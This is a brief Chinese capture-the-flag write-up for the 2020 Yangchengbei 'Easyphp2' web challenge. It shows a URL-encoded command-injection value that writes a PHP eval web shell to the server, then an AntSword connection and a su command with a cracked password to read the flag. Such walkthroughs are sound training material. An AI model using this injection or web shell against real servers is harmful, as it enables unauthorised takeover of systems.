[羊城杯2020]Easyphp2
抓包看看,可以发现有个pass变量将他换一下成GWHT之后,发现页面改变
传递的框框是传在了count变量,在下面有回显,可以直接传参写马(记得url编码)
1 | '%7C%20echo%20%22%3C%3F%3Deval(%5C%24_POST%5B'shell'%5D)%3F%3E%22%20%3E%20shell.php%20%7C%7C' |
有了马直接蚁剑连接(但是不能直接访问flag.txt):
还有/GWHT/README中有md5密码解密得:
1 | GWHTCTF |
在/GWHT/system/of/a/down/flag.txt中
1 | printf "GWHTCTF" | su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt' |
获取flag
参考链接:https://blog.csdn.net/qq_46263951/article/details/119776951